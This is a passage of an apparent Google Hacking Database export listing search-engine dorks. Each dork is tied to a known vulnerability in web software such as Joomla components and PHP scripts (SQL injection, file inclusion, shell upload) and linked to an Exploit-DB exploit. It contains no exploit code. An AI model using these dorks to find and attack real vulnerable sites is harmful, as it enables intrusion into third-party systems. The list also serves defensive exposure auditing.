<textualDescription>Joomla Component com_org SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11725</textualDescription>
<query>inurl:&quot;option=com_org&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22option%3Dcom_org%22</querystring>
<edb>https://www.exploit-db.com/exploits/11725</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2764</id>
<link>https://www.exploit-db.com/ghdb/2764</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;option=com_simpleshop&quot; &amp; inurl:&quot;viewprod&quot;</shortDescription>
<textualDescription>Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14501</textualDescription>
<query>inurl:&quot;option=com_simpleshop&quot; &amp; inurl:&quot;viewprod&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22option%3Dcom_simpleshop%22+%26+inurl:%22viewprod%22</querystring>
<edb>https://www.exploit-db.com/exploits/14501</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3558</id>
<link>https://www.exploit-db.com/ghdb/3558</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;option=com_tophotelmodule&quot;</shortDescription>
<textualDescription>CVE: 2009-3368
EDB-ID:
This search potentially exposes Joomla Hotel Booking System XSS/SQL Injection Vulnerabilities</textualDescription>
<query>inurl:&quot;option=com_tophotelmodule&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22option%3Dcom_tophotelmodule%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2605</id>
<link>https://www.exploit-db.com/ghdb/2605</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;photo_album.php?alb_id=&quot;</shortDescription>
<textualDescription>SpireCMS v2.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10408</textualDescription>
<query>inurl:&quot;photo_album.php?alb_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22photo_album.php%3Falb_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10408</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2849</id>
<link>https://www.exploit-db.com/ghdb/2849</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;php/showContent.php?linkid=&quot;</shortDescription>
<textualDescription>Worldviewer.com CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12163</textualDescription>
<query>inurl:&quot;php/showContent.php?linkid=&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22php%2FshowContent.php%3Flinkid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12163</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2187</id>
<link>https://www.exploit-db.com/ghdb/2187</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;phpRaid&quot; &quot;phpRaid&quot; &quot;roster.php?Sort=Race&quot;</shortDescription>
<textualDescription>phpRaid 3.0.7 (rss.php phpraid_dir) Remote File Inclusion: https://www.exploit-db.com/exploits/3528</textualDescription>
<query>inurl:&quot;phpRaid&quot; &quot;phpRaid&quot; &quot;roster.php?Sort=Race&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22phpRaid%22++%22phpRaid%22+%22roster.php%3FSort%3DRace%22</querystring>
<edb>https://www.exploit-db.com/exploits/3528</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2383</id>
<link>https://www.exploit-db.com/ghdb/2383</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;phpsecurepages&quot;</shortDescription>
<textualDescription>phpSecurePages 0.28b (secure.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2452</textualDescription>
<query>inurl:&quot;phpsecurepages&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22phpsecurepages%22</querystring>
<edb>https://www.exploit-db.com/exploits/2452</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3530</id>
<link>https://www.exploit-db.com/ghdb/3530</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;phpwcms/index.php?id=&quot;</shortDescription>
<textualDescription>phpwcms 1.2.6 (Cookie: wcs_user_lang) Local File Include: https://www.exploit-db.com/exploits/2758</textualDescription>
<query>inurl:&quot;phpwcms/index.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22phpwcms/index.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/2758</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2767</id>
<link>https://www.exploit-db.com/ghdb/2767</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;phshoutbox.php&quot;</shortDescription>
<textualDescription>PhShoutBox 1.5 (final) Insecure Cookie Handling Vulnerability - CVE: 2008-1971: https://www.exploit-db.com/exploits/5467</textualDescription>
<query>inurl:&quot;phshoutbox.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22phshoutbox.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/5467</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1999</id>
<link>https://www.exploit-db.com/ghdb/1999</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;picture.php?cat=&quot; &quot;Powered by PhpWebGallery 1.3.4&quot;</shortDescription>
<textualDescription>PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6436</textualDescription>
<query>inurl:&quot;picture.php?cat=&quot; &quot;Powered by PhpWebGallery 1.3.4&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22picture.php%3Fcat%3D%22+%22Powered+by+PhpWebGallery+1.3.4%22</querystring>
<edb>https://www.exploit-db.com/exploits/6436</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2775</id>
<link>https://www.exploit-db.com/ghdb/2775</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;picture.php?cat=&quot; &quot;Powered by PhpWebGallery 1.3.4&quot;</shortDescription>
<textualDescription>PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities - CVE: 2008-4591: https://www.exploit-db.com/exploits/6425</textualDescription>
<query>inurl:&quot;picture.php?cat=&quot; &quot;Powered by PhpWebGallery 1.3.4&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22picture.php%3Fcat%3D%22+%22Powered+by+PhpWebGallery+1.3.4%22</querystring>
<edb>https://www.exploit-db.com/exploits/6425</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2290</id>
<link>https://www.exploit-db.com/ghdb/2290</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;powered by eggblog&quot;</shortDescription>
<textualDescription>Eggblog 3.07 Remote (SQL Injection / Privilege Escalation) - CVE: 2006-2725: https://www.exploit-db.com/exploits/1842</textualDescription>
<query>inurl:&quot;powered by eggblog&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22powered+by+eggblog%22</querystring>
<edb>https://www.exploit-db.com/exploits/1842</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3373</id>
<link>https://www.exploit-db.com/ghdb/3373</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;printable_pedigree.php&quot; </shortDescription>
<textualDescription>Dog Pedigree Online Database 1.0.1b Multiple SQL Injection: https://www.exploit-db.com/exploits/8738</textualDescription>
<query>inurl:&quot;printable_pedigree.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22printable_pedigree.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/8738</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3411</id>
<link>https://www.exploit-db.com/ghdb/3411</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;printable_pedigree.php&quot; </shortDescription>
<textualDescription>Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling: https://www.exploit-db.com/exploits/8739</textualDescription>
<query>inurl:&quot;printable_pedigree.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22printable_pedigree.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/8739</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3540</id>
<link>https://www.exploit-db.com/ghdb/3540</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;printable_pedigree.php&quot; </shortDescription>
<textualDescription>Dog Pedigree Online Database 1.0.1b Blind SQL Injection: https://www.exploit-db.com/exploits/8740</textualDescription>
<query>inurl:&quot;printable_pedigree.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22printable_pedigree.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/8740</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2269</id>
<link>https://www.exploit-db.com/ghdb/2269</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;printer.asp?forum=&quot;</shortDescription>
<textualDescription>ASP Message Board 2.2.1c Remote SQL Injection Vulnerability - CVE: 2007-5887: https://www.exploit-db.com/exploits/4609</textualDescription>
<query>inurl:&quot;printer.asp?forum=&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22printer.asp%3Fforum%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/4609</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1946</id>
<link>https://www.exploit-db.com/ghdb/1946</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;product_desc.php?id=&quot; Powered by Zeeways.com</shortDescription>
<textualDescription>ZeeWays Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11087</textualDescription>
<query>inurl:&quot;product_desc.php?id=&quot; Powered by Zeeways.com</query>
<querystring>https://www.google.com/search?q=inurl:%22product_desc.php%3Fid%3D%22+Powered+by+Zeeways.com</querystring>
<edb>https://www.exploit-db.com/exploits/11087</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2572</id>
<link>https://www.exploit-db.com/ghdb/2572</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;product_desc.php?id=&quot; Powered by Zeeways.com</shortDescription>
<textualDescription>Zeeways Script Multiple Vulnerabilities - CVE: 2010-2144: https://www.exploit-db.com/exploits/12805</textualDescription>
<query>inurl:&quot;product_desc.php?id=&quot; Powered by Zeeways.com</query>
<querystring>https://www.google.com/search?q=inurl:%22product_desc.php%3Fid%3D%22+Powered+by+Zeeways.com</querystring>
<edb>https://www.exploit-db.com/exploits/12805</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3652</id>
<link>https://www.exploit-db.com/ghdb/3652</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;produtos.asp?produto=&quot;</shortDescription>
<textualDescription>Submitter: Br0ly https://www.exploit-db.com/exploits/15776</textualDescription>
<query>inurl:&quot;produtos.asp?produto=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;produtos.asp?produto=&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/15776</edb>
<date>2010-12-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>4520</id>
<link>https://www.exploit-db.com/ghdb/4520</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;pubdlcnt.php?file=&quot; ext:php</shortDescription>
<textualDescription>Finds EVEN MORE redirection vulnerabilities... Go crazy.
Dxtroyer</textualDescription>
<query>inurl:&quot;pubdlcnt.php?file=&quot; ext:php</query>
<querystring>https://www.google.com/search?q=inurl:&quot;pubdlcnt.php?file=&quot; ext:php</querystring>
<edb></edb>
<date>2017-06-12</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>2408</id>
<link>https://www.exploit-db.com/ghdb/2408</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;read.asp?fID=&quot;</shortDescription>
<textualDescription>JiRo?s FAQ Manager (read.asp fID) SQL Injection Vulnerability - CVE: 2008-2691: https://www.exploit-db.com/exploits/5753</textualDescription>
<query>inurl:&quot;read.asp?fID=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22read.asp%3FfID%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/5753</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1439</id>
<link>https://www.exploit-db.com/ghdb/1439</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;sbw2Behoerden.php&quot;</shortDescription>
<textualDescription>German.Authorities.CMS SQL Injection Vulnerability. Bug: /data/sbw2Behoerden.php?sbwtyp=
Author: Bloodman</textualDescription>
<query>inurl:&quot;sbw2Behoerden.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22sbw2Behoerden.php%22&amp;num=10&amp;ft=i&amp;cr=&amp;safe=images</querystring>
<edb></edb>
<date>2010-11-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>2546</id>
<link>https://www.exploit-db.com/ghdb/2546</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;search_form.php?sb_showresult=&quot;</shortDescription>
<textualDescription>Getacoder clone (sb_protype) Remote SQL Injection Vulnerability - CVE: 2008-3372: https://www.exploit-db.com/exploits/6143</textualDescription>
<query>inurl:&quot;search_form.php?sb_showresult=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22search_form.php%3Fsb_showresult%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6143</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2229</id>
<link>https://www.exploit-db.com/ghdb/2229</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;search_results.php?browse=1&quot;</shortDescription>
<textualDescription>SoftBizScripts Dating Script SQL Injection Vunerability - CVE: 2006-3271: https://www.exploit-db.com/exploits/12438</textualDescription>
<query>inurl:&quot;search_results.php?browse=1&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22search_results.php%3Fbrowse%3D1%22</querystring>
<edb>https://www.exploit-db.com/exploits/12438</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1442</id>
<link>https://www.exploit-db.com/ghdb/1442</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;section.php?name=singers&quot;</shortDescription>
<textualDescription>6rbScript 3.3 (section.php name) Local File Inclusion Vulnerability - CVE: 2008-6453: https://www.exploit-db.com/exploits/6520</textualDescription>
<query>inurl:&quot;section.php?name=singers&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22section.php%3Fname%3Dsingers%22</querystring>
<edb>https://www.exploit-db.com/exploits/6520</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1504</id>
<link>https://www.exploit-db.com/ghdb/1504</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;section.php?name=singers&quot;</shortDescription>
<textualDescription>6rbScript 3.3 (singerid) Remote SQL Injection Vulnerability - CVE: 2008-6454: https://www.exploit-db.com/exploits/6511</textualDescription>
<query>inurl:&quot;section.php?name=singers&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22section.php%3Fname%3Dsingers%22</querystring>
<edb>https://www.exploit-db.com/exploits/6511</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1636</id>
<link>https://www.exploit-db.com/ghdb/1636</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;select_file2.php&quot;</shortDescription>
<textualDescription>Flashden Multiple File Uploader Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10236</textualDescription>
<query>inurl:&quot;select_file2.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22select_file2.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/10236</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2411</id>
<link>https://www.exploit-db.com/ghdb/2411</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;simpleblog3&quot;</shortDescription>
<textualDescription>SimpleBlog 3.0 (simpleBlog.mdb) Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7232</textualDescription>
<query>inurl:&quot;simpleblog3&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22simpleblog3%22</querystring>
<edb>https://www.exploit-db.com/exploits/7232</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1716</id>
<link>https://www.exploit-db.com/ghdb/1716</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;sinagb.php&quot;</shortDescription>
<textualDescription>Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability - CVE: 2007-1130: https://www.exploit-db.com/exploits/3366</textualDescription>
<query>inurl:&quot;sinagb.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22sinagb.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/3366</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3696</id>
<link>https://www.exploit-db.com/ghdb/3696</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;sitegenius/topic.php&quot;</shortDescription>
<textualDescription>Submitter: dR.sqL SQL Injection: http://localhost/sitegenius/topic.php?id=[SQLi]</textualDescription>
<query>inurl:&quot;sitegenius/topic.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sitegenius/topic.php&quot;</querystring>
<edb></edb>
<date>2011-03-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6101</id>
<link>https://www.exploit-db.com/ghdb/6101</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;sites/all/modules/ckeditor&quot; -drupalcode.org</shortDescription>
<textualDescription># Google Dork: inurl:&quot;sites/all/modules/ckeditor&quot; -drupalcode.org
# Drupal Module CKEditor 3.0 &lt; 3.6.2 - Persistent EventHandler Cross-Site
Scripting. This dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/18389
# Date: 19/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>inurl:&quot;sites/all/modules/ckeditor&quot; -drupalcode.org</query>
<querystring>https://www.google.com/search?q=inurl:&quot;sites/all/modules/ckeditor&quot; -drupalcode.org</querystring>
<edb></edb>
<date>2020-05-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>622</id>
<link>https://www.exploit-db.com/ghdb/622</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;slxweb.dll&quot;</shortDescription>
<textualDescription>salesLogix is the Customer Relationship Management solution thatdrives sales performance in small to medium-sized businesses through Sales, Marketing, and Customer Support automation and back-office integration.The problem:By manipulating the cookies used by the Web Client, it is possible totrick the server into authenticating a remote user as the CRM administrator without requiring a password. It is also possible to perform SQL injection attacks on the SQL serverthat is used as the data store for the SalesLogix CRM system, reveal detailed error reports contained in HTTP headers and disclose the real filesystem paths to various SalesLogix directories. The SalesLogix server itself is vulnerable to an attack that wouldallow a malicious user to obtain the username and password used to access the SQL server used as a data store. The disclosed username and password always have read/write permissions on the database. Another vulnerability in the SalesLogix server allows anunauthenticated user to upload arbitrary files to the server in any directory (s)he chooses.http://www.securityfocus.com/bid/11450</textualDescription>
<query>inurl:&quot;slxweb.dll&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=inurl%3A%22slxweb.dll%22+</querystring>
<edb></edb>
<date>2004-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1708</id>
<link>https://www.exploit-db.com/ghdb/1708</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;sticker/sticker.php?id=&quot;</shortDescription>
<textualDescription>2Capsule (sticker.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7631</textualDescription>
<query>inurl:&quot;sticker/sticker.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22sticker/sticker.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/7631</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6850</id>
<link>https://www.exploit-db.com/ghdb/6850</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;telerik.web.ui.webresource.axd?type=rau&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;telerik.web.ui.webresource.axd?type=rau&quot;
References;
https://github.com/noperator/CVE-2019-18935
https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui
Author: Eray Çakın
</textualDescription>
<query>inurl:&quot;telerik.web.ui.webresource.axd?type=rau&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;telerik.web.ui.webresource.axd?type=rau&quot;</querystring>
<edb></edb>
<date>2021-03-29</date>
<author>Eray Çakın</author>
</entry>
<entry>
<id>3784</id>
<link>https://www.exploit-db.com/ghdb/3784</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;tiki-index.php&quot; filetype:php &quot;This is TikiWiki 1.9&quot;</shortDescription>
<textualDescription>The server vulnerable to =&gt; CVE 2006-4602</textualDescription>
<query>inurl:&quot;tiki-index.php&quot; filetype:php &quot;This is TikiWiki 1.9&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;tiki-index.php&quot; filetype:php &quot;This is TikiWiki 1.9&quot;</querystring>
<edb></edb>
<date>2012-05-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1945</id>
<link>https://www.exploit-db.com/ghdb/1945</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;tinybrowser.php?&quot;</shortDescription>
<textualDescription>TinyBrowser Remote File upload Vulnerability: https://www.exploit-db.com/exploits/12692</textualDescription>
<query>inurl:&quot;tinybrowser.php?&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22tinybrowser.php%3F%22</querystring>
<edb>https://www.exploit-db.com/exploits/12692</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1583</id>
<link>https://www.exploit-db.com/ghdb/1583</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;toplist.php&quot; &quot;powered by phpbb&quot;</shortDescription>
<textualDescription>TopList</textualDescription>
<query>inurl:&quot;toplist.php&quot; &quot;powered by phpbb&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22toplist.php%22+%22powered+by+phpbb%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2256</id>
<link>https://www.exploit-db.com/ghdb/2256</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;tr.php?id=&quot; Short Url &amp; Url Tracker</shortDescription>
<textualDescription>YourFreeWorld Short Url &amp; Url Tracker (id) SQL Injection Vuln - CVE: 2008-4885: https://www.exploit-db.com/exploits/6940</textualDescription>
<query>inurl:&quot;tr.php?id=&quot; Short Url &amp; Url Tracker</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=inurl:%22tr.php%3Fid%3D%22+Short+Url+%26+Url+Tracker</querystring>
<edb>https://www.exploit-db.com/exploits/6940</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2087</id>
<link>https://www.exploit-db.com/ghdb/2087</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;tr1.php?id=&quot;</shortDescription>
<textualDescription>YourFreeWorld Scrolling Text Ads (id) SQL Injection Vulnerability - CVE: 2008-4885: https://www.exploit-db.com/exploits/6942</textualDescription>
<query>inurl:&quot;tr1.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22tr1.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6942</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2009</id>
<link>https://www.exploit-db.com/ghdb/2009</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;tr1.php?id=&quot; Forced Matrix</shortDescription>
<textualDescription>YourFreeWorld Forced Matrix Script (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6939</textualDescription>
<query>inurl:&quot;tr1.php?id=&quot; Forced Matrix</query>
<querystring>https://www.google.com/search?q=inurl:%22tr1.php%3Fid%3D%22+Forced+Matrix</querystring>
<edb>https://www.exploit-db.com/exploits/6939</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2532</id>
<link>https://www.exploit-db.com/ghdb/2532</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;track.php?id=&quot;</shortDescription>
<textualDescription>phpstore Wholesale (track.php?id) SQL Injection Vulnerability - CVE: 2008-5493: https://www.exploit-db.com/exploits/7134</textualDescription>
<query>inurl:&quot;track.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22track.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/7134</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2622</id>
<link>https://www.exploit-db.com/ghdb/2622</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;track.php?id=&quot;</shortDescription>
<textualDescription>SFS EZ BIZ PRO (track.php id) Remote SQL Injection Vulnerability - CVE: 2008-6245: https://www.exploit-db.com/exploits/6910</textualDescription>
<query>inurl:&quot;track.php?id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22track.php%3Fid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6910</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1712</id>
<link>https://www.exploit-db.com/ghdb/1712</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;tradeCategory.php?id= &quot;</shortDescription>
<textualDescription>Hampshire Trading Standards Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12768</textualDescription>
<query>inurl:&quot;tradeCategory.php?id= &quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22tradeCategory.php%3Fid%3D+%22</querystring>
<edb>https://www.exploit-db.com/exploits/12768</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2517</id>
<link>https://www.exploit-db.com/ghdb/2517</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;userjournals.php?blog.&quot;</shortDescription>
<textualDescription>e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8417</textualDescription>
<query>inurl:&quot;userjournals.php?blog.&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22userjournals.php%3Fblog.%22</querystring>
<edb>https://www.exploit-db.com/exploits/8417</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2344</id>
<link>https://www.exploit-db.com/ghdb/2344</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;vbplaza.php?do=&quot;</shortDescription>
<textualDescription>vBulletin vbBux/vbPlaza 2.x (vbplaza.php) Blind SQL Injection Vuln: https://www.exploit-db.com/exploits/8784</textualDescription>
<query>inurl:&quot;vbplaza.php?do=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22vbplaza.php%3Fdo%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/8784</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2559</id>
<link>https://www.exploit-db.com/ghdb/2559</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;vcalendar_asp&quot;</shortDescription>
<textualDescription>VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability: https://www.exploit-db.com/exploits/7180</textualDescription>
<query>inurl:&quot;vcalendar_asp&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22vcalendar_asp%22</querystring>
<edb>https://www.exploit-db.com/exploits/7180</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2580</id>
<link>https://www.exploit-db.com/ghdb/2580</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;view.php?ItemID=&quot; rating &quot;rate this review&quot;</shortDescription>
<textualDescription>Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability - CVE: 2008-1783: https://www.exploit-db.com/exploits/5387</textualDescription>
<query>inurl:&quot;view.php?ItemID=&quot; rating &quot;rate this review&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22view.php%3FItemID%3D%22+rating+%22rate+this+review%22</querystring>
<edb>https://www.exploit-db.com/exploits/5387</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1725</id>
<link>https://www.exploit-db.com/ghdb/1725</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;view_group.php?group_id=&quot;</shortDescription>
<textualDescription>Vastal I-Tech SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12845</textualDescription>
<query>inurl:&quot;view_group.php?group_id=&quot;</query>
<querystring>https://www.google.com/search?q=inurl:%22view_group.php%3Fgroup_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/12845</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2471</id>
<link>https://www.exploit-db.com/ghdb/2471</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:&quot;webboard/view.php?topic=&quot;</shortDescription>
